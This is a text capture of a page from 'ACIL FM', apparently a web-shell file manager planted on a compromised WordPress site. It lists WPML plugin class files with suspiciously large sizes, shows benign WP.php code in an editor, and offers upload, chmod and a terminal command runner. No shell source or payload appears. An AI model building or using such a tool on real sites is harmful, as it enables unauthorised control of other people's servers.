ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/sitepress-multilingual-cms/vendor/wpml/wp/classes
/
home
mhhtmff
www
site
wp-content
plugins
sitepress-multilingual-cms
vendor
wpml
wp
classes
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Attachment.php
989 B
chmod
View
DL
Edit
Rename
Delete
Cache.php
4.35 MB
chmod
View
DL
Edit
Rename
Delete
Gutenberg.php
784 B
chmod
View
DL
Edit
Rename
Delete
Hooks.php
1.89 MB
chmod
View
DL
Edit
Rename
Delete
Http.php
546 B
chmod
View
DL
Edit
Rename
Delete
Nonce.php
1.08 MB
chmod
View
DL
Edit
Rename
Delete
Option.php
3.5 MB
chmod
View
DL
Edit
Rename
Delete
Post.php
2.89 MB
chmod
View
DL
Edit
Rename
Delete
PostType.php
1.27 MB
chmod
View
DL
Edit
Rename
Delete
Resources.php
2.37 MB
chmod
View
DL
Edit
Rename
Delete
Roles.php
382 B
chmod
View
DL
Edit
Rename
Delete
Transient.php
877 B
chmod
View
DL
Edit
Rename
Delete
Url.php
891 B
chmod
View
DL
Edit
Rename
Delete
User.php
5.45 MB
chmod
View
DL
Edit
Rename
Delete
WP.php
610 B
chmod
View
DL
Edit
Rename
Delete
WPDB.php
433 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/sitepress-multilingual-cms/vendor/wpml/wp/classes/WP.php
<?php namespace WPML\LIB\WP; use WPML\FP\Either; use WPML\FP\Logic; class WordPress { /** * Compare the WordPress version. * @param string $operator * @param string $version * * @return bool */ public static function versionCompare( $operator, $version ) { global $wp_version; return version_compare( $wp_version, $version, $operator ); } /** * @param mixed $var * * @return \WPML\FP\Either|callable */ public static function handleError( $var = null ) { return call_user_func_array( Logic::ifElse( 'is_wp_error', Either::left(), Either::right() ), func_get_args() ); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply